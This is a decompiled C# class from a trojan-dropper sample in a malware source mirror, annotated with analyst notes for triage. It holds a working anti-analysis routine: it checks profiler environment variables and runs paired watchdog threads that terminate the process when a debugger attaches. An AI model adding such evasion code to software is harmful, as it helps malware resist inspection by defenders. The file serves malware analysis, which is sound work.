mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
f2ac1ece55
add
// Decompiled with JetBrains decompiler
// Type: 倍鄻<E984BB>聍˵ꆬ
// Assembly: Inclorofom, Version=1.1.5.6, Culture=neutral, PublicKeyToken=null
// MVID: A522D052-C5DC-490C-B0ED-0BBC19A34C0E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.awqq-edab95afd20436274ac39e7bbd9b33db4903ad56017b194e3d2cdd8b211b0f3e.exe
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Threading;
/// <summary>
/// Anti-analysis helper recovered from the decompiled sample. It terminates the
/// process when a CLR profiler is configured or a managed debugger is attached,
/// and runs two background threads that monitor each other.
/// </summary>
/// <remarks>
/// Analyst notes:
/// - Identifiers are obfuscated; \uFFFD in a name means the original character
///   was lost, so these names cannot be relied on for matching across samples.
/// - Environment.FailFast records its message in the Windows Application event
///   log before terminating, so the literals "Profiler detected",
///   "Debugger detected (Managed)" and "Loop broken" are usable triage indicators.
/// - NOTE(review): the strings and layout resemble the anti-debug helper injected
///   by the Confuser obfuscator family; unverified, confirm against a reference.
/// </remarks>
internal static class 倍鄻\u2D97\uFFFD\uEF6C聍\u02F5ꆬ
{
    // The three P/Invoke declarations below are not called by either method
    // visible in this class; they are kept exactly as the decompiler emitted them.

    [DllImport("ntdll.dll", EntryPoint = "NtQueryInformationProcess", CallingConvention = CallingConvention.StdCall, SetLastError = true, PreserveSig = false)]
    private static extern int Ꮬꮼﮈ\uF1BE铰崘\uFFFD䉩(IntPtr ProcessHandle, int ProcessInformationClass, byte[] ProcessInformation, uint ProcessInformationLength, out int ReturnLength);

    [DllImport("ntdll.dll", EntryPoint = "NtSetInformationProcess", CallingConvention = CallingConvention.StdCall, SetLastError = true, PreserveSig = false)]
    private static extern uint \uF092됃戏잦ᰐ䣩㼑촓(IntPtr ProcessHandle, int ProcessInformationClass, byte[] ProcessInformation, uint ProcessInformationLength);

    [DllImport("kernel32.dll", EntryPoint = "CloseHandle", PreserveSig = false)]
    private static extern bool 䵕䞬遤\uA9FF亗\u2E54Ợ㝕(IntPtr hObject);

    /// <summary>
    /// Entry point of the check: aborts if a profiler is configured, then starts
    /// the two watchdog threads.
    /// </summary>
    public static void 鈧렠\u1AF4鱛렪뜾㶘䄋()
    {
        // Any non-null value in either variable triggers termination (even "0").
        // COR_PROFILER is only read when COR_ENABLE_PROFILING is unset.
        string profilingFlag = Environment.GetEnvironmentVariable("COR_ENABLE_PROFILING");
        if (profilingFlag != null || Environment.GetEnvironmentVariable("COR_PROFILER") != null)
        {
            Environment.FailFast("Profiler detected");
        }

        Thread watcherA = new Thread(new ParameterizedThreadStart(ﱞꬕ興쉱㕷\uE4E0\u3371缣));
        Thread watcherB = new Thread(new ParameterizedThreadStart(ﱞꬕ興쉱㕷\uE4E0\u3371缣));
        watcherA.IsBackground = true;
        watcherB.IsBackground = true;

        // Each thread receives the other as its argument. The worker sleeps
        // 1000 ms before its first liveness check, so the 500 ms gap lets the
        // second thread start before the first one inspects it.
        watcherA.Start(watcherB);
        Thread.Sleep(500);
        watcherB.Start(watcherA);
    }

    /// <summary>
    /// Watchdog loop: once per second, terminates the process if a managed
    /// debugger is attached or logging, or if the peer thread has stopped.
    /// </summary>
    /// <param name="thread">The peer <see cref="Thread"/> whose liveness is monitored.</param>
    private static void ﱞꬕ興쉱㕷\uE4E0\u3371缣(object thread)
    {
        Thread.Sleep(1000);
        Thread peer = (Thread) thread;
        for (;;)
        {
            if (Debugger.IsAttached || Debugger.IsLogging())
            {
                Environment.FailFast("Debugger detected (Managed)");
            }

            // A dead peer means one watchdog thread was stopped.
            if (!peer.IsAlive)
            {
                Environment.FailFast("Loop broken");
            }

            Thread.Sleep(1000);
        }
    }
}